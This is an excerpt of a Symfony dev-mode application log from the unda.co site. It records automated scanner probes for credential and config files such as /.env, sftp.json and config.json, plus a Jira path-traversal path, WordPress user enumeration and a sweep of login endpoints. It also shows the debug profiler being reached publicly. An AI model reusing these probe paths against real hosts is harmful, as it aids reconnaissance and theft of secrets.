  995. [2025-12-16 17:01:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  996. [2025-12-16 17:01:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  997. [2025-12-16 17:01:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  998. [2025-12-16 17:01:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  999. [2025-12-16 17:01:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1000. [2025-12-16 17:01:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1001. [2025-12-16 17:01:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1002. [2025-12-16 17:01:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1003. [2025-12-16 17:01:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1004. [2025-12-16 17:01:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1005. [2025-12-16 17:01:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1006. [2025-12-16 17:01:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1007. [2025-12-16 17:01:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1008. [2025-12-16 17:01:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1009. [2025-12-16 17:01:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1010. [2025-12-16 17:01:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1011. [2025-12-16 17:01:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1012. [2025-12-16 17:01:42] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  1013. [2025-12-16 17:01:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1014. [2025-12-16 17:01:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1015. [2025-12-16 17:01:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1016. [2025-12-16 17:01:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1017. [2025-12-16 17:01:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1018. [2025-12-16 17:01:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  1019. [2025-12-16 17:01:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1020. [2025-12-16 17:01:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1021. [2025-12-16 17:01:51] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1022. [2025-12-16 17:01:51] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1023. [2025-12-16 17:01:51] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1024. [2025-12-16 17:01:51] security.DEBUG: Calling Authentication entry point. [] []
  1025. [2025-12-16 17:06:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1026. [2025-12-16 17:06:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  1027. [2025-12-16 17:06:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /formaction"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /formaction\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1028. [2025-12-16 17:06:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1029. [2025-12-16 17:06:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/callback"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/callback\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1030. [2025-12-16 17:06:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1031. [2025-12-16 17:06:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1032. [2025-12-16 17:06:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1033. [2025-12-16 17:06:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1034. [2025-12-16 17:06:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dashboard"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dashboard\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1035. [2025-12-16 17:06:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /admin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /admin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1036. [2025-12-16 17:06:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /account"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /account\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1037. [2025-12-16 17:06:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1038. [2025-12-16 17:06:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /settings"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /settings\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1039. [2025-12-16 17:06:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/user"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/user\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1040. [2025-12-16 17:06:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1041. [2025-12-16 17:06:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1042. [2025-12-16 17:06:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /submit"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /submit\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1043. [2025-12-16 17:20:38] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://www.unda.co/_profiler/search?limit=10","method":"GET"} []
  1044. [2025-12-16 17:20:38] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"770c18","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/770c18/search/results?limit=10","method":"GET"} []
  1045. [2025-12-16 17:20:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
  1046. [2025-12-16 17:21:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234?panel=request","method":"GET"} []
  1047. [2025-12-16 17:21:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1048. [2025-12-16 17:24:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3259f5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3259f5?panel=swiftmailer","method":"GET"} []
